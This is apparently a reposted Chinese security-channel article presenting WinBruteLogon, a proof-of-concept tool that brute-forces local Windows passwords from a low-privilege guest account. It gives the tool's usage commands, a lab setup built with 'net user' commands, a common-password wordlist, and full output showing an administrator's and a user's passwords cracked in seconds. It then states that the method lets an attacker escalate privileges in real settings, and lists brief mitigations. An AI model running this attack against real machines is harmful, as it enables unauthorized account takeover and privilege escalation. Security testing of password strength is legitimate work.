点击上方蓝字“Ots安全”一起玩耍
发布日期:2020-05-14
目标:Windows XP 到最新的 Windows 10 版本 (1909)
弱点 :
LogonUserA, LogonUserW, CreateProcessWithLogonA,CreateProcessWithLogonW
用法
词表文件
WinBruteLogon.exe -u <username> -w <wordlist_file>
标准输入词表
type <wordlist_file> | WinBruteLogon.exe -u <username> -
介绍
PoC 测试场景(使用访客账户)
在 Windows 10 上测试
创建一个新的管理员用户
net user darkcodersc /add
net user darkcodersc trousers (trousers 是密码)
net localgroup administrators darkcodersc /add
创建普通用户
net user HackMe /add
net user HackMe ozlq6qwm (ozlq6qwm 是密码)
创建一个新的访客帐户
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
获取词汇表
在我的情况都trousers和ozlq6qwm在SecList:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
开始攻击
从管理员帐户注销或重新启动您的机器并登录到访客帐户。
将 PoC 可执行文件放在您可以作为访客用户访问的任何位置。
用法 :
WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v 是可选的,它设计了详细模式。
默认情况下,域名是%USERDOMAIN%env var指定的值。您可以使用选项指定自定义名称-d
破解第一个用户:(darkcodersc管理员)
提示(来宾)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
等待几秒钟以查看以下结果:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
破解第二个用户:(HackMe普通用户)
提示(来宾)
>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
等待几秒钟以查看以下结果:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
真实世界场景
如果您获得对低权限用户的访问权限,则可以破解更高权限用户的密码并提升您的权限。
缓解(一般)
-
禁用访客帐户(如果存在)。
-
应用程序白名单。
-
按照指南创建并保持密码强度。将此应用于所有用户。
原文始发于微信公众号(Ots安全):【安全工具】Windows用户爆破 蛮力登录(概念证明)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论